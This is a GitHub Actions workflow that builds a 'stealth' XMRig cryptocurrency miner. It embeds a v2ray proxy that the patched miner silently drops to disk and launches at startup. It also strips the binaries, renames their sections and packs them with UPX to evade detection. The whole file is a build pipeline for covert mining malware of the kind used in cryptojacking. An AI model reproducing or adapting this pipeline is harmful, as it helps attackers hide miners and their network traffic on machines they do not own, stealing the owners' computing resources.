name: Fixed XMRig Stealth Build

on:
  workflow_dispatch:
  schedule:
    - cron: '0 0 * * *'

jobs:
  stealth-build:
    runs-on: ubuntu-latest
    timeout-minutes: 25

    steps:
    - name: Clone XMRig
      uses: actions/checkout@v4
      with:
        repository: xmrig/xmrig
        path: src/xmrig

    - name: Clone v2ray-core
      uses: actions/checkout@v4
      with:
        repository: v2fly/v2ray-core
        path: src/v2ray

    - name: Setup Build Tools
      run: |
        sudo apt-get update
        sudo apt-get install -y \
          build-essential cmake libuv1-dev libssl-dev libhwloc-dev \
          golang upx-ucl xxd

    - name: Build v2ray Proxy
      working-directory: src/v2ray
      run: |
        CGO_ENABLED=0 go build -ldflags "-s -w -buildid=" -trimpath -o v2ray ./main

    - name: Generate v2ray Header
      run: |
        xxd -i src/v2ray/v2ray > src/xmrig/src/v2ray_embed.h

    - name: Patch XMRig Source
      working-directory: src/xmrig
      run: |
        # 使用临时文件避免sed语法问题
        cat << 'EOF' > patch_app.cpp
        #include "v2ray_embed.h"
        
        void StartProxy() {
            FILE* f = fopen("v2ray", "wb");
            fwrite(v2ray, 1, v2ray_len, f);
            fclose(f);
            chmod("v2ray", 0700);
            system("./v2ray -config=config.json >/dev/null 2>&1 &");
        }
        EOF

        # 将补丁插入到App.cpp中
        sed -i '/#include "base\/kernel\/Platform.h"/r patch_app.cpp' src/App.cpp
        
        # 在Platform.cpp添加启动调用
        sed -i '/Platform::init(/a \ \ \ \ StartProxy();' src/base/kernel/Platform.cpp
        
        # 清理临时文件
        rm patch_app.cpp

    - name: Build XMRig
      working-directory: src/xmrig
      run: |
        mkdir -p build
        cd build
        cmake .. \
          -DWITH_HTTPD=OFF \
          -DWITH_OPENCL=OFF \
          -DWITH_CUDA=OFF \
          -DCMAKE_BUILD_TYPE=Release \
          -DCMAKE_C_FLAGS="-flto -fomit-frame-pointer" \
          -DCMAKE_CXX_FLAGS="-flto -fomit-frame-pointer"
        make -j$(nproc)

        objcopy --rename-section .text=.cryptext \
                --rename-section .data=.cryptdata \
                xmrig
        upx --ultra-brute --lzma xmrig -o xmrig_stealth

    - name: Upload Artifact
      uses: actions/upload-artifact@v4
      with:
        name: xmrig-stealth
        path: src/xmrig/build/xmrig_stealth
